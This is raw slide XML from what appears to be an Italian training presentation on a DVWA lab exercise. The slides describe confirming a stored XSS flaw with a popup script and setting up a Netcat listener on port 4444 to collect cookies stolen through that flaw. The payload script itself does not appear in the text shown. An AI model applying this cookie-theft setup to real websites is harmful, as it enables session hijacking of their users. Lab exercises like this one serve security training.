              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2801"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2801"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2801"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 29" id="29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="true" rot="6098770">
            <a:off x="16140364" y="3555861"/>
            <a:ext cx="2534758" cy="1299063"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1299063" w="2534758">
                <a:moveTo>
                  <a:pt x="0" y="1299064"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2534758" y="1299064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2534758" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1299064"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId8"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 30" id="30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="5729857">
            <a:off x="9236837" y="6982930"/>
            <a:ext cx="2534758" cy="1299063"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1299063" w="2534758">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2534758" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2534758" y="1299064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1299064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId8"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover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537146" y="4468854"/>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400000">
            <a:off x="-2519171" y="6021991"/>
            <a:ext cx="7472928" cy="6931140"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="6931140" w="7472928">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7472928" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7472928" y="6931140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6931140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 4" id="4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="700016" y="-526064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5400000">
            <a:off x="2943662" y="-27432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5400000">
            <a:off x="13928287" y="2849604"/>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10800000">
            <a:off x="14134873" y="-1563445"/>
            <a:ext cx="5414402" cy="5184290"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5184290" w="5414402">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5414401" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5414401" y="5184290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5184290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 8" id="8"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1772259" y="845286"/>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3.3 - VERIFICA DELLE VULNERABILITÀ</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0217734" y="1637865"/>
            <a:ext cx="6298006" cy="1685730"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1685730" w="6298006">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6298007" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6298007" y="1685730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1685730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="-78869" t="-355693" r="-78205" b="-252046"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 11" id="11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="9144000" y="3462405"/>
            <a:ext cx="8115300" cy="6025156"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="6025156" w="8115300">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8115300" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8115300" y="6025156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6025156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="-21727" t="-17106" r="-19641" b="-23204"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 12" id="12"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="true"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="-1969375" y="331772"/>
            <a:ext cx="7483269" cy="10369787"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="4734560" cy="6560820"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 13" id="1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4" id="1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5" id="1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0" t="-2194" r="0" b="-2194"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 16" id="16"/>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7" id="17"/>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8" id="18"/>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9" id="19"/>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20" id="20"/>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1" id="21"/>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2" id="22"/>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3" id="23"/>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24" id="24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="1184370">
            <a:off x="6667101" y="1429017"/>
            <a:ext cx="2700628" cy="2430566"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2430566" w="2700628">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2700629" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2700629" y="2430565"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2430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1993961" y="956569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7" id="27"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="329377" y="3275970"/>
            <a:ext cx="6006616" cy="4433765"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3944"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2817">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Inserendo lo script nella casella di input del messaggio, otteniamo un popup che ci dimostra che il sito è vulnerabile a un attacco </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2817">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>XSS.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2817">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> Aggiornando la pagina, possiamo vedere che l‘input è stato conservato dalla DVWA e quindi è un esempio di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2817">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>XSS stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2817">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>, salvato all’interno del database.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 28" id="28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="true" rot="-1858239">
            <a:off x="5822932" y="7334826"/>
            <a:ext cx="2700628" cy="2430566"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2430566" w="2700628">
                <a:moveTo>
                  <a:pt x="0" y="2430565"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2700628" y="2430565"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2700628" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2430565"/>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cover dir="d"/>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131759" y="7006442"/>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800000">
            <a:off x="3771284" y="5143500"/>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4" id="4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="11134744" y="-2575651"/>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5" id="5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="-4738396" y="7588140"/>
            <a:ext cx="7736552" cy="7407749"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="7407749" w="7736552">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7736552" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7736552" y="7407748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7407748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 6" id="6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="-4295188" y="-2575651"/>
            <a:ext cx="9990407" cy="9266102"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="9266102" w="9990407">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9990407" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9990407" y="9266102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9266102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 7" id="7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-5400000">
            <a:off x="13339117" y="-1721790"/>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TextBox 8" id="8"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1759925" y="820093"/>
            <a:ext cx="14768151" cy="649498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="4366"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5900" spc="-536">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Medium"/>
              </a:rPr>
              <a:t>3.4 - CONFIGURAZIONE WEB SERVER</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10" id="10"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="true"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="1619581" y="-887168"/>
            <a:ext cx="5087918" cy="10067321"/>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0" id="20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10534889" y="6592740"/>
            <a:ext cx="5224982" cy="995399"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="995399" w="5224982">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5224982" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5224982" y="995400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="995400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="-7787" r="-228161" b="-775644"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 21" id="21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="8457047" y="2322381"/>
            <a:ext cx="3087692" cy="1771563"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1771563" w="3087692">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3087692" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3087692" y="1771563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1771563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 22" id="22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="5335752">
            <a:off x="11313125" y="4303641"/>
            <a:ext cx="3013084" cy="1728757"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1728757" w="3013084">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3013084" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3013084" y="1728756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1728756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 23" id="23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="11424785" y="2629321"/>
            <a:ext cx="3686637" cy="1157684"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1157684" w="3686637">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3686637" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3686637" y="1157683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1157683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect l="0" t="-69017" r="-820842" b="-291758"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 24" id="24"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="11927286" y="9533029"/>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700016" y="9565699"/>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6" id="26"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="310883" y="2133615"/>
            <a:ext cx="8455604" cy="3873033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2825"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2018">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Prima di procedere all’inserimento dello script malevolo, dobbiamo assicurarci di avere un web server fittizio dove reindirizzare i cookie che ruberemo. Utilizzeremo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2018">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2018">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>, un potente tool di connessione di rete, molto versatile utilizzato </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2018">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>per leggere e scrivere dati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2018">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> attraverso connessioni di rete utilizzando i protocolli TCP o UDP.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2825"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2018">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Il comando nella figura a destra consiste in:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="435768" indent="-217884" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2825"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2018">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>nc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2018">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>= avvia Netcat.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="435768" indent="-217884" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2825"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2018">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>-l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2018">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>= specifica a netcat di mettersi in ascolto, ovvero di leggere le connessioni in arrivo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="435768" indent="-217884" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2825"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2018">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>- p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2018">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> = specifica la porta su cui netcat deve ascoltare, in questo caso la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2018">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>4444.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover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4297441" y="-2432577"/>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1842915" y="4501426"/>
            <a:ext cx="7428197" cy="7576077"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="7576077" w="7428197">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7428196" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7428196" y="7576077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7576077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="-9963" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 8" id="8"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1672016"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3.5 - SCRIPT</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12541371" y="9539288"/>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1" id="11"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 12" id="12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1862344" y="2314441"/>
            <a:ext cx="14601412" cy="743963"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="19468549" cy="991951"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr name="Group 13" id="13"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="0">
              <a:off x="1096973" y="0"/>
              <a:ext cx="17274603" cy="991951"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="2291554" cy="131587"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr name="Freeform 14" id="14"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
